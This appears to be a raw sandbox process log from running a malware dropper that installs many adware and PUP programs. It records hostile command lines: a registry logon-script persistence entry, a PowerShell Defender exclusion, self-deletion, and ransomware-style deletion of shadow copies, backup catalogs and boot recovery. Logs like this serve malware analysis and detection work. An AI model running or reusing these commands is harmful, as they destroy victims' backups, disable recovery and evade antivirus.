"C:\Users\Admin\Documents\c2GaMRbuGRYHSDZ2uleDbvjt.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6684 -s 292
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
C:\Users\Admin\AppData\Roaming\5067096.exe
"C:\Users\Admin\AppData\Roaming\5067096.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
C:\Users\Admin\AppData\Local\Temp\is-PTJ53.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-PTJ53.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 312
C:\Users\Admin\AppData\Local\Temp\is-0FPF0.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-0FPF0.tmp\Setup.tmp" /SL5="$4031E,17361482,721408,C:\Users\Admin\AppData\Local\Temp\is-PTJ53.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629403837 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 744 -p 5336 -ip 5336
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-2T1D4.tmp\{app}\microsoft.cab -F:* %ProgramData%
C:\Windows\SysWOW64\cmd.exe
cmd
C:\Users\Admin\AppData\Local\Temp\is-5CI89.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-5CI89.tmp\Setup.exe" /silent /subid=720
C:\Users\Admin\AppData\Local\Temp\is-MTSN4.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-MTSN4.tmp\Setup.tmp" /SL5="$30526,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-5CI89.tmp\Setup.exe" /silent /subid=720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5336 -s 276
C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
C:\Users\Admin\AppData\Local\Temp\71B2.exe
C:\Users\Admin\AppData\Local\Temp\71B2.exe
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 0BD1E6B7AF665DF9EAFBD14B895F02CF C
C:\Windows\SysWOW64\PING.EXE
ping YJTUIPJF -n 30
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
Esplorarne.exe.com i
C:\Windows\SysWOW64\expand.exe
expand C:\Users\Admin\AppData\Local\Temp\is-2T1D4.tmp\{app}\microsoft.cab -F:* C:\ProgramData
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 7372 -ip 7372
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 544 -p 5124 -ip 5124
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7372 -s 456
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5124 -s 2328
C:\Users\Admin\AppData\Local\Temp\99BD.exe
C:\Users\Admin\AppData\Local\Temp\99BD.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files\Common Files\LKZFYRTWEP\ultramediaburner.exe
"C:\Program Files\Common Files\LKZFYRTWEP\ultramediaburner.exe" /VERYSILENT
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding DDB1B11B61552B5203C275018E564250
C:\Users\Admin\AppData\Local\Temp\f0-9c43e-84f-6af91-17fa8b716bfcb\SHekozhuvaxi.exe
"C:\Users\Admin\AppData\Local\Temp\f0-9c43e-84f-6af91-17fa8b716bfcb\SHekozhuvaxi.exe"
C:\Users\Admin\AppData\Local\Temp\is-269JU.tmp\ultramediaburner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-269JU.tmp\ultramediaburner.tmp" /SL5="$20528,281924,62464,C:\Program Files\Common Files\LKZFYRTWEP\ultramediaburner.exe" /VERYSILENT
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-JH53N.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-JH53N.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629403837 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
C:\Users\Admin\AppData\Local\Temp\0d-d88f0-acf-00085-1b5b7aac6381d\Qaemycovevae.exe
"C:\Users\Admin\AppData\Local\Temp\0d-d88f0-acf-00085-1b5b7aac6381d\Qaemycovevae.exe"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 3F98F9707B901C52F4920E3772721E12 C
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 3228 -ip 3228
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\BE1F.exe
C:\Users\Admin\AppData\Local\Temp\BE1F.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3228 -s 2440
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 548 -p 920 -ip 920
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 920 -s 2296
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
C:\Users\Admin\AppData\Local\Temp\is-2T1D4.tmp\{app}\vdi_compiler.exe
"C:\Users\Admin\AppData\Local\Temp\is-2T1D4.tmp\{app}\vdi_compiler"
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
C:\Users\Admin\AppData\Local\Temp\E280.exe
C:\Users\Admin\AppData\Local\Temp\E280.exe
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629403837 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 7484 -ip 7484
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7484 -s 2408
C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{5677b0a2-28e0-2744-9412-ec2c8fbf1c5e}\oemvista.inf" "9" "4d14a44ff" "00000000000000F0" "WinSta0\Default" "0000000000000160" "208" "c:\program files (x86)\maskvpn\driver\win764"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 2116 -ip 2116
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2116 -s 292
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "000000000000015C" "f3c7"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
C:\Users\Admin\AppData\Local\Temp\1912.exe
C:\Users\Admin\AppData\Local\Temp\1912.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449&param=721
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7fffdc7f46f8,0x7fffdc7f4708,0x7fffdc7f4718
C:\Users\Admin\AppData\Local\Temp\003a3b70-6dcd-43dc-9f01-f8d1cbc33f03\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\003a3b70-6dcd-43dc-9f01-f8d1cbc33f03\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\003a3b70-6dcd-43dc-9f01-f8d1cbc33f03\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
C:\Users\Admin\AppData\Local\Temp\3C6A.exe
C:\Users\Admin\AppData\Local\Temp\3C6A.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\003a3b70-6dcd-43dc-9f01-f8d1cbc33f03\test.bat"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2sd02z0z.mka\GcleanerEU.exe /eufive & exit
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2216,88590065161410142,3314017797234145916,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2216,88590065161410142,3314017797234145916,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2684 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2216,88590065161410142,3314017797234145916,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2240 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,88590065161410142,3314017797234145916,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3104 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,88590065161410142,3314017797234145916,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3124 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\47A6.exe
C:\Users\Admin\AppData\Local\Temp\47A6.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffdc7f46f8,0x7fffdc7f4708,0x7fffdc7f4718
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\2sd02z0z.mka\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\2sd02z0z.mka\GcleanerEU.exe /eufive
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\apncvajf.3s4\installer.exe /qn CAMPAIGN="654" & exit
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,88590065161410142,3314017797234145916,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5144 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,88590065161410142,3314017797234145916,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4620 /prefetch:1
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3rigxgq2.0t2\ufgaa.exe & exit
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,88590065161410142,3314017797234145916,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5232 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,88590065161410142,3314017797234145916,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\703E.exe
C:\Users\Admin\AppData\Local\Temp\703E.exe
C:\Users\Admin\AppData\Local\Temp\apncvajf.3s4\installer.exe
C:\Users\Admin\AppData\Local\Temp\apncvajf.3s4\installer.exe /qn CAMPAIGN="654"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1912.exe" -Force
C:\Users\Admin\AppData\Local\Temp\1912.exe
C:\Users\Admin\AppData\Local\Temp\1912.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,88590065161410142,3314017797234145916,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 760 -p 5328 -ip 5328
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2216,88590065161410142,3314017797234145916,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5868 /prefetch:8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 1488 -ip 1488
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ln1yyofb.l5k\anyname.exe & exit
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5328 -s 288
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 39EE19C65A9234F784013CDCFB4D90B0 C
C:\Users\Admin\AppData\Local\Temp\974F.exe
C:\Users\Admin\AppData\Local\Temp\974F.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 296
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\ln1yyofb.l5k\anyname.exe
C:\Users\Admin\AppData\Local\Temp\ln1yyofb.l5k\anyname.exe
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2216,88590065161410142,3314017797234145916,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5868 /prefetch:8
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe" -start
C:\Users\Admin\AppData\Local\Temp\ln1yyofb.l5k\anyname.exe
"C:\Users\Admin\AppData\Local\Temp\ln1yyofb.l5k\anyname.exe" -q
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zjylqg20.pmv\gcleaner.exe /mixfive & exit
C:\Users\Admin\AppData\Local\Temp\zjylqg20.pmv\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\zjylqg20.pmv\gcleaner.exe /mixfive
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 760 -p 5828 -ip 5828
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 820
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 7580 -ip 7580
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7580 -s 884
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\apncvajf.3s4\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\apncvajf.3s4\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629403837 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4464 -ip 4464
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 288
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wied5by0.qki\autosubplayer.exe /S & exit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im MSBuild.exe /f & timeout /t 6 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" & del C:\ProgramData\*.dll & exit
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /im MSBuild.exe /f
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\timeout.exe
timeout /t 6
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe" -agent 0
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
